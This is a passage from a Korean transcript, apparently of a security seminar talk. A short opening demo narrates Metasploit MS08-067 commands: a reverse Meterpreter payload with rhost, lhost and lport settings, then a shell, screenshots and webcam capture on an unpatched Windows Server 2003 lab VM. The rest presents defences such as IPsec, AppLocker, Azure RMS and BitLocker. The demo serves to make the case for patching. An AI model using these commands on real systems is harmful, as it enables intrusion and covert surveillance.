나오고 있지만요. 패치가 더 이상 안 나오게 되면 어떤 일이 발생하는지 보여드리겠습니다. 먼저 윈도우 서버 2003에 한 대가 있어요. IP 주소는 192.168.100.15번이라고 하는 컴퓨터입니다. VM입니다. 이에 대한 취약점을 돌릴 수 있는 툴이 있어요. 인터넷에서 되게 쉽게 구할 수 있는 툴인데요. 얘를 돌리면요. 포트를 다 스캐닝을 합니다. 파이어월을 안 열어놨다면. 그런 다음에 어떤 취약점이 있는지 이렇게 잡아내요. 패치가 뭐가 안 깔렸다는 거죠. 말 그대로 불법입니다만 제가 선생님들 회사 안에 제 컴퓨터 갖고 들어가서 일반적인 컴퓨터를 가지고 2%를 깔고 한 100메가 좀 안 넘거든요. 얘를 돌리면 선생님들 회사 내에 있는 네트워크에 있는 패치가 안 깔린 컴퓨터를 다 칠 수가 있다는 겁니다. 그럼 지금 봤더니 제 컴퓨터의 15번이 이런 패치를 안 깔렸다는 건데요. 여기서 제가 MS08-067 지금 여기에 이런 패치에 대한 부분이라는 거거든요. 제가 MS08-067이라고 하는 패치를 가지고 안 깔린다고 공격을 하겠다는 거예요. 그런 다음에 해당되는 것을 공격하기 위해서 set payload 윈도우스의 메타 대 리버스 이건 뭐냐면 공격하는 방식에 대한 접속 방식이고요. set rhost 원격 컴퓨터는 19168.100.15번이었었고요. 그다음에 제 컴퓨터는 현재 데모하는 컴퓨터요. IP 주소가 58번이에요. 그럼 set lhost 19168.100.58번 lport 8080 run 이러면 해당되는 컴퓨터의 취약점을 접속을 하는 겁니다. 되게 쉽죠. 방법을 여기서 제가 쉘이라고 쳐볼까요? 이러면 잠깐만요. 쉘 쓰면 이렇게 커맨드 프롬프트가 떨어져요. 이게 누구 거게요 지금요? IP 컴픽을 쳐서 보면은 15번께 떨어지는 겁니다. 여기서 제가 스크린샷이라고 하는 명령을 쓰면 현재 이 컴퓨터 화면이 그대로 찍혀서 제 컴퓨터에 저장이 됩니다. 이런 식의 툴을 돌려버리면 모든 걸 다 잡아버릴 수가 있다는 거. 정말로 있는지 보면은요. 현재 이 컴퓨터의 C 드라이브에 이 툴에 A, B 엔터 쳐보면 현재 제 윈도우 서버의 화면, 현재는 스크린세이버가 돌아오고 있는 거죠. 이 화면이 그대로 나오는 거고요. 뭐도 있냐면 웹캠 스타트라고 하는 명령어도 있고요. 이 컴퓨터를 다 핸들링 해볼 수가 있는 겁니다. 이렇게 내부에서 뭔가를 돌려버릴 수 있는 경우에 대해서 첫 번째로 보여드렸고요. 두 번째로는요. IP 시큐리티인데요. 얘입니다. 윈도우 서버에는 기본적으로 IP 시큐리티가 있는 거 잘 아실 겁니다. 얘를 이용하면 특정한 IP 대역에서는 IP 시큐리티를 요구하게 설정할 수가 있습니다. 현재 두 대의 컴퓨터가 있는데요. 현재 이쪽 컴퓨터에서는 제가 해당 서버에 접속을 하면은 이렇게 서버로 잘 접속이 되는 모습을 볼 수가 있어요. 그런데 여기에 있는 컴퓨터에서 똑같은 경로에 들어가면 얘는 접속이 안 되고 화면이 이렇게 멈춰 있는 것을 볼 수가 있습니다. 근데 실제로 한번 핑을 쳐보면 핑은 잘 돼요. 근데 접속이 왜 안 되는지 열어보면은 이렇게 포트가 연결이 안 되는 모습을 볼 수가 있습니다. 바로 제가 서버에다가 IP 시큐리티 설정을 해놨기 때문에 여기 이런 겁니다. 지금 보시면 ICMP-v4 핑은 다 열게 해놨어요. 근데 나머지 포트를 접속할 때는 반드시 IP 시큐리티 하라고 설정을 해놨기 때문입니다. ADS는 이렇게 해서 인증서를 내려보내는 컨셉을 핸들링 하실 수가 있고요. 지금 아까 전에 얘가
접속이 안 됐잖아요. 접속이 안 된 이유는 현재 인증서가 없기 때문입니다. AD에 들어가고 회사에서 원하는 보안 절차를 완료를 하면은요. 그래서 제가 확인을 누르면요. 여기에 F5를 누르면 인증서가 이렇게 생기고요. 이 이후부터는 접속이 안 됐던 이 서버가 잠시 후에 접속이 되기 시작을 합니다. 잠시 후에 보여드릴게요. 인증서가 나왔다 안 나왔다는 구조로 IPsec을 핸들링할 수가 있습니다. 그럼 제가 만약에 다시 여기서 해당되는 회사 정책을 변경을 해버리면 해당되는 인증서가 없어지죠. 그럼 이제 IP 시큐리티가 이제 차단되는 형태라고 보시면 된다는 겁니다. 네 번째는 애플리케이션에 대한 방어인데요. 애플리케이션에 대한 방어는 쓰지 못하게 하는 프로그램을 막는 기술로 윈도우에는 기본적으로 엠라커라는 기술이 들어있습니다. 아까 전에 정훈이 대표의 슬라이드에 엠라커라는 단어가 있었던 걸 보일 수가 있어요. 그다음에 아니면 앞서 말씀드린 것처럼 아예 어플리케이션을 뜯어진 공간에 실행하는 또 하나의 방법일 수가 있다는 겁니다. 그다음에 세 번째로는 어플리케이션을 아예 클라이언트가 핸들링할 수 없도록 중앙에서 관리하는 겁니다. 또 한 가지를. 그런 기술로 FV라고 하는 기술이 있습니다. 그래서 간단하게 엠라커에 대한 기술을 또 하나 보여드리고요. 두 번째로는 어플리케이션 버추얼라이제이션에서 한번 보여드리죠. 제가 여기서 이제요. 시작의 실행이 안 보이니까요. 쭉 올려서요. 계산기를 한번 실행해 볼게요. 그럼 이런 메시지가 나와요. 그 다음에 사진 못 찍게 하고 싶어요. 그럼 여기서 카메라를 실행을 하지 말아야 되거든요. 카메라를 실행할 때 이런 식으로 차단할 수 있는 기능이 있다는 겁니다. 별도 에이전트는 안 깔고 순수하게 윈도우 상태입니다. 근데 이거 말고요. 이 상태에서 제가 노트패드를 실행하면 노트패드는 실행이 됩니다. 또 이렇게 프로그램을 핸들링할 수 있는 기능이 엠라커라고 분명히 말씀을 드렸고요. 얘도 아까 보여드렸던 액티브 디렉토리에서 핸들링할 수 있는 기능입니다. 여기서 제가 정책을 확장을 하고 윈도우스를 확장을 해보면 보안 설정이라는 항목이 있고요. 보안 설정 안에 응용 프로그램 제어 정책이라는 거 안에서 정책을 만들 수 있게 설계가 되어져 있습니다. 그러면 제가 여기를 확장을 해보면 제가 방금 전에 계산기를 막아놨고요. 두 번째로는 카메라를 막아놓은 것을 보일 수가 있죠. 이렇게 등록된 것은 실행되지 않는 구조입니다. 또 한 가지는 어플리케이션을 중앙에서 뿌려주는 겁니다. 필요할 때. 리모트 앱 같은 경우는 원격 실행을 보여주지 않았습니까? 근데 이제는 어플리케이션 내려줬다가 회수하는 컨셉이라 생각하시면 됩니다. 제가 가지고 있는 또 하나의 컴퓨터에서요. 현재 이 컴퓨터에는 제가 탐색기를 열어보면 C 드라이브에 프로그램 파일스 밑에 어도비라고 하는 폴더는 어디도 없습니다. 여기도 없고요. 32 밑에도 없어요. 근데 여기서 제가 어도비라고 검색을 하면 어도비 리더 9이 나와요. 얘를 클릭하면은 프로그램이 어딘가에서 내려와서 마치 설치된 것처럼 동작시켜주는 기술입니다. 서버 관리자가 할 일은 해당되는 이미지가 정상적으로 서버에 있는지를 확인을 하고요. 필요한 경우에 권한을 가지고 줬다 뺐다라는 기술이라고 보시면 돼요. 그러면 업데이트도 중앙에서 하시면 되고요. 그다음에 제거도 중앙에서 쉽게 설계가 되어져 있습니다. 이런 식의 기술을 어플리케이션 버추얼라이제이션이라고 저희는 표현을 하고 있다는 겁니다. 데이터에 대한 보안입니다. USB를 분실했을 때라든가 이럴 때가 있지 않습니까? 나아가서 현재 만든 파일에 대해서 아까 정우진 대표께서 말씀하신 재밌었던 게 유통기간 기억하시죠? 언제쯤 없어질 수 있게 만들 수 있어야 된다. 아니면은 이거 보냈는데 정말로 내가 찍은 사람만 보자는 거예요. 이때 옛날에요. 저희가 윈도우 서버의 RMS라고 기억하시나요? 윈도우 서버 안에 있던. RMS 약점은요. 이거예요. 기본적으로 지원하는 프로그램이 별로 없어서 정확하게는 오피스밖에 없어가지고 이 기능을 쓰려고 하면 오피스를 가지고만 쓸 수밖에 없다는 겁니다. 우리나라에서 많이 쓰는 추가적인 확장자라든가 뭐 CAD 파일이라든가 그림 파일 이런 것들은 할 수가 없었습니다. 근데 최근에 RMS가 확장이 되면서 모바일도 지원을 하고 파일 타입에 대한 제한이 없는 애저의 RMS 기능이 나왔습니다. 새롭게. 얘는 오피스에서 하는 것이 아니라 만든 파일을 가지고 바로 암호화를 쉽게 만들어져 있습니다. 필요한 경우에는요. 그리고 비트라커를 사내에서 얼마나 쓰는지에 대해서 확인할 수 있는 엠밤이라고 하는 툴도 있고 얘는 관리자 열면요. 우리 회사 컴퓨터가 몇 대가 비트라커 되어져 있고 몇 대가 비트라커 되지 않았다라고 하는 정보들을 볼 수가 있다는 거죠. 그래서 애저 RMS는 이런 식의 컴퓨터들을 지원하고 있습니다. 윈도우, 맥 다 지원하고 있고요. iOS, 안드로이드, 윈도우 폰 모두 다 지원하고 있습니다. 텍스트 파일, PNG 파일, GIF 파일, 워드 파일, 엑셀 파일, 파워포인트 파일 대부분의 파일들을 다 지원을 하고 있는 형태로 되어져 있습니다. 감을 잡으셨겠지만 더 이상
뭐에 국한되지 않았을까요? 만드는 어플리케이션에 국한되지 않고 돌아간다는 뜻으로 생각하시면 됩니다. 그래서 마지막으로 얘기 드릴 것이 이제 메일에 대한 스팸에 대한 부분인데요. 옛날에는 저희가 스팸용 엔진을 별도로 판매했습니다만 스팸에 대한 관리를 위해서도 익스체인지 서버에 엣지를 쓰시거나 별도로 클라우드 솔루션을 쓸 수 있게 만들어 드리는 것도 두 가지 옵션으로 제공한다는 것이죠. 첫 번째로는 비트라커를 보여드릴 거예요. 비트라커는 어렵지가 않은 것이 윈도우 서버의 윈도우 클라이언트에 기본적으로 내장이 되어져 있는 기능입니다. 필요하시면 켜서 쓰시면 되고요. 비트라커가 되는 드라이브는 이런 식으로 자물쇠 표시가 나게 됩니다. Azure RMS가 처음 보시는 분들이 거의 대다수이실 건데요. Azure RMS는 Azure에다 설정을 하면은요, 클라이언트에서 원하는 파일에서 오른쪽 버튼을 누르면 이런 식의 새롭게 된 메뉴가 등장을 하게 됩니다. 그래서 여기서 기밀이라고 하거나 사용자 지정 권한을 클릭하면은 RMS 서버가 Azure에 있는 형태로 되어져 있는 것이고요. 아까 전에 정우진 대표께서 말씀하셨던 항목이 나오는데요. 여기서 인증을 받고 되면은 이 하단에 보이시죠? 콘텐츠 만료 날짜. 이 날짜가 체크가 되게 되면은 이 날짜에 의해 해당 파일은 더 이상 안 열리게 됩니다. 그리고 사내에 사용자가 있다면 여기서 권한을 주는 형태로 공유할 수 있게 만들어져 있다는 겁니다. 얘는 운영체에 대한 구분 없고 디바이스에 대한 구분 없이 사용할 수가 있고요. 나아가서 기본적인 설정이 다 어디에 들어있냐면 아까 보셨던 윈도우 애저 내에 액티브 디렉토리에 가보면 라인 매니지먼트라고 하는 기능을 제공하고 있고 현재는 프리뷰 버전으로 써보실 수 있게 되어져 있습니다. 제가 시간이 남으면 이런저런 얘기를 드리려고 한 장에 대한 버퍼를 넣어놨습니다. 근데 저는 항상 얘기하는 것이 기술보다 중요한 건 사람입니다. 이 모든 걸 다 만들어놔도 제가 맨날 얘기 드리지만 모니터 뒤집어 엎고 복사기를 해가버리면 진짜 답 없습니다. 사람이 무언가를 핸들링할 수 없게 되어져 있다면 결국에는 모든 것은 다 망하게 될 수밖에 없다는 겁니다. 근데 오늘 보여드린 기능은 최대한 윈도우 안에 있는 기술 위주로 보여드린 거고요. 추가적으로 필요하다면 퍼블릭 클라우드를 확장할 수 있는 컨셉으로 설명을 드리려고 노력을 했습니다. 다음번에 더 좋은 자리에서 뵙도록 하겠습니다. 감사합니다.